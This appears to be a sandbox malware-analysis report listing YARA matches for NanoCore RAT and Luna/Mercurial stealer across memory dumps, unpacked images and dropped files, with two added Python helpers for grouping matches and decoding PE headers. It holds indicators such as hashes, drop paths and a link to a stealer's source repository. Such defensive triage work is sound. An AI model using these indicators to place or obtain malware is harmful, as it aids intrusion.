Source: 00000002.00000000.283905085.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283285603.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.287642993.0000000003DE4000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.554989173.0000000005720000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.283614922.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.555253844.0000000005C40000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000000.282943204.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000002.00000002.549792626.0000000000A82000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000000.00000002.286708512.0000000000692000.00000002.00020000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: 4Y85lSOUJ0.exe PID: 6896, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\ProgramData\output.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\ProgramData\nano.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\ProgramData\nano.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
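The match list above repeats the same three rule families across dozens of dump names, which hides the one fact worth extracting from it: the submitted file matches both the NanoCore and the Luna/Mercurial rules, while nano.exe matches only NanoCore and output.exe only Luna/Mercurial. The following triage helper is an added example written for this page (it is not part of the Joe Sandbox report nor tooling from any of the rule authors). It parses lines in the report's "Source: ..., type: ... Matched rule: ... Author: ..." layout and collapses them per image and family, joining memory-dump (.sdmp) hits to an image name through the process index. The sample input is a constructed subset of lines copied from this page; reading the first two dotted fields of a .unpack or .sdmp name as sandbox process index and stage, mapping rule descriptions to family names by keyword, and the "evidence" labels are assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample input: a few "Matched rule" lines in the exact layout this
# report uses. They are copied shapes from the page, not new findings.
SAMPLE_REPORT = r"""
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0.0.4Y85lSOUJ0.exe.690000.0.unpack, type: UNPACKEDPE Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000002.00000002.553881083.00000000042DB000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: nano.exe PID: 6968, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: C:\ProgramData\output.exe, type: DROPPED Matched rule: Detect Luna stealer (also Mercurial Grabber) Author: Arkbird_SOLG
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
"""

LINE_RE = re.compile(r"^Source: (?P<src>.+?), type: (?P<kind>\w+) Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$")
# Assumption: "<proc>.<stage>.<image>.<base>.<idx>[.raw].unpack" for unpacked PE dumps
UNPACK_RE = re.compile(r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9a-f]+)\.(?P<idx>\d+)(?P<raw>\.raw)?\.unpack$")
# Assumption: "<proc>.<stage>.<id>.<addr>.<protect>.<type>.sdmp" for raw memory dumps
SDMP_RE = re.compile(r"^(?P<proc>\d{8})\.(?P<stage>\d{8})\.\d+\.(?P<addr>[0-9A-F]{16})\.[0-9A-F]{8}\.[0-9A-F]{8}\.sdmp$")
MEMSTR_RE = re.compile(r"^Process Memory Space: (?P<image>.+?) PID: (?P<pid>\d+)$")


def family_of(rule: str) -> str:
    """Map a rule description to a family label (assumption: keyword mapping)."""
    r = rule.lower()
    if "nanocore" in r:
        return "NanoCore"
    if "luna" in r or "mercurial" in r:
        return "Luna/Mercurial"
    return "other"


def parse_line(line: str):
    """Parse one 'Source: ... Matched rule: ...' line into a record, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src, kind = m["src"], m["kind"]
    rec = {"kind": kind, "rule": m["rule"], "family": family_of(m["rule"]), "proc": None, "image": None}
    if kind == "UNPACKEDPE":
        u = UNPACK_RE.match(src)
        if u:
            rec.update(proc=int(u["proc"]), image=u["image"], evidence="unpacked-raw" if u["raw"] else "unpacked")
    elif kind == "MEMORY":
        s = SDMP_RE.match(src)
        if s:
            rec.update(proc=int(s["proc"]), evidence="memory-dump")
    elif kind == "MEMORYSTR":
        s = MEMSTR_RE.match(src)
        if s:
            rec.update(image=s["image"], evidence="memory-strings")
    elif kind == "DROPPED":
        rec.update(image=src.rsplit("\\", 1)[-1], evidence="dropped-file")
    rec.setdefault("evidence", kind.lower())
    return rec


def summarize(report_text: str):
    """Return {image: {family: set(evidence kinds)}}; .sdmp hits are joined to an image via process index."""
    recs = [r for r in (parse_line(l) for l in report_text.splitlines()) if r]
    proc_to_image = {r["proc"]: r["image"] for r in recs if r["proc"] is not None and r["image"]}
    summary = defaultdict(lambda: defaultdict(set))
    for r in recs:
        image = r["image"] or proc_to_image.get(r["proc"], f"proc{r['proc']}")
        summary[image][r["family"]].add(r["evidence"])
    return {img: dict(fams) for img, fams in summary.items()}


def multi_family_images(summary) -> list:
    """Images that match rules of more than one family (the loader/dropper candidates)."""
    return sorted(img for img, fams in summary.items() if len(fams) > 1)


if __name__ == "__main__":
    s = summarize(SAMPLE_REPORT)
    for img, fams in s.items():
        for fam, ev in fams.items():
            print(f"{img:18} {fam:15} {', '.join(sorted(ev))}")
    print("multi-family:", multi_family_images(s))
```

Run against the full report text the same grouping tells you which image to treat as the dropper (the one carrying both families) and which evidence kinds back each family, which is more useful for an incident write-up than the flat list of dump names.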
Uses 32bit PE files
Source: 4Y85lSOUJ0.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
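The "Uses 32bit PE files" finding is read from the Characteristics field of the COFF file header. The following added example (written for this page, not tooling from the report) decodes those bits with the standard library and also reads the CLR runtime header when one is present, because for a .NET assembly, and the signatures on this page say the sample is .NET, 32BIT_MACHINE in the COFF header does not by itself mean the code will run as a 32-bit process: an ILONLY assembly without 32BITREQUIRED is AnyCPU and is loaded into a 64-bit process on x64 Windows, which matters when you choose the bitness of the debugger or dumping tool. The build_test_pe helper fabricates a minimal PE32 image purely to exercise the parser; it is constructed test data, not the sample.

```python
import struct

# COFF Characteristics bits (PE/COFF specification)
COFF_FLAGS = {0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE", 0x0020: "LARGE_ADDRESS_AWARE",
              0x0100: "32BIT_MACHINE", 0x0200: "DEBUG_STRIPPED", 0x2000: "DLL"}
MACHINES = {0x14C: "I386", 0x8664: "AMD64", 0x1C0: "ARM", 0xAA64: "ARM64"}
COMIMAGE_FLAGS_ILONLY = 0x1          # IMAGE_COR20_HEADER.Flags bits
COMIMAGE_FLAGS_32BITREQUIRED = 0x2
CLR_DIRECTORY_INDEX = 14             # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def _rva_to_offset(rva, sections):
    for va, vsize, raw_ptr, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            return rva - va + raw_ptr
    raise ValueError("RVA not backed by any section")


def describe_pe(data: bytes) -> dict:
    """Decode machine, PE32/PE32+, COFF characteristics and, if present, CLR header flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    machine, nsec, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                   # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    info = {"machine": MACHINES.get(machine, hex(machine)),
            "format": {0x10B: "PE32", 0x20B: "PE32+"}.get(magic, hex(magic)),
            "characteristics": sorted(n for bit, n in COFF_FLAGS.items() if chars & bit),
            "clr": None}
    dd_base = opt + (96 if magic == 0x10B else 112)  # start of the data directory table
    clr_entry = dd_base + CLR_DIRECTORY_INDEX * 8
    if clr_entry + 8 <= opt + opt_size:
        clr_rva, clr_size = struct.unpack_from("<II", data, clr_entry)
        if clr_rva and clr_size:
            sec_base = opt + opt_size
            sections = []
            for i in range(nsec):                    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
                vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", data, sec_base + i * 40 + 8)
                sections.append((va, vsize, raw_ptr, raw_size))
            flags = struct.unpack_from("<I", data, _rva_to_offset(clr_rva, sections) + 16)[0]
            info["clr"] = {"il_only": bool(flags & COMIMAGE_FLAGS_ILONLY),
                           "32bit_required": bool(flags & COMIMAGE_FLAGS_32BITREQUIRED)}
    return info


def effective_bitness(info: dict) -> str:
    """Process bitness the loader will actually use on x64 Windows (stock loader and CLR rules)."""
    if info["clr"] and info["clr"]["il_only"]:
        return "32-bit" if info["clr"]["32bit_required"] else "AnyCPU (64-bit process on x64)"
    return "64-bit" if info["format"] == "PE32+" else "32-bit"


def build_test_pe(*, chars: int, clr_flags=None) -> bytes:
    """Constructed minimal PE32 image (test data, not a real sample) with one .text section."""
    opt_size, sec_va, sec_raw, sec_len = 224, 0x1000, 0x200, 0x200
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    if clr_flags is not None:                          # CLR header at the start of .text
        struct.pack_into("<II", opt, 96 + CLR_DIRECTORY_INDEX * 8, sec_va, 72)
    section = b".text\0\0\0" + struct.pack("<IIII", sec_len, sec_va, sec_len, sec_raw) + b"\0" * 16
    headers = dos + b"PE\0\0" + coff + bytes(opt) + section
    headers += b"\0" * (sec_raw - len(headers))
    body = bytearray(sec_len)
    if clr_flags is not None:                          # cb, major, minor, MetaData RVA/size, Flags
        struct.pack_into("<IHHIII", body, 0, 72, 2, 5, 0, 0, clr_flags)
    return headers + bytes(body)


if __name__ == "__main__":
    for label, blob in [("native x86", build_test_pe(chars=0x0102)),
                        ("AnyCPU .NET", build_test_pe(chars=0x0102, clr_flags=0x1)),
                        ("x86-only .NET", build_test_pe(chars=0x0102, clr_flags=0x3))]:
        d = describe_pe(blob)
        print(f"{label:14} {d['machine']} {d['format']} {d['characteristics']} -> {effective_bitness(d)}")
```

Point the same functions at a real file (open(path, "rb").read()) to reproduce the static finding and, for managed samples, to see whether the COFF flag is the whole story.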
Yara signature match
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 4Y85lSOUJ0.exe, type: SAMPLE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.0.nano.exe.a80000.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5720000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de9114.5.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69c870.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.5c40000.7.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42ee67c.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.2de43ac.4.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 5.2.output.exe.300000.0.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.69c870.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.2.nano.exe.a80000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 2.2.nano.exe.42f2ca5.4.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0.0.4Y85lSOUJ0.exe.69226b.2.raw.unpack, type: UNPACKEDPE Matched rule: MAL_Luna_Stealer_Apr_2021_1 date = 2021-08-29, hash4 = ce35eb5ba2f3f36b3d2742b33d3dbbe95f5ec6b93942ba20be4693528b163e3a, hash3 = 0521bb85472869598d9aa822b11edc04044dbe876dbf9900565bfdc8e02c2b21, hash2 = 93563f68975a858ff07f7eb91f4e0c997f0212d58b1755704d89fecd442d448f, hash1 = a14918133b9b818fa2e8728faa075c4f173fa69abc424f39621d6aa1405f5a18, author = Arkbird_SOLG, description = Detect Luna stealer (also Mercurial Grabber), adversary = -, reference = https://github.com/NightfallGT/Mercurial-Grabber, tlp = White
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0.2.4Y85lSOUJ0.exe.3de4268.6.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
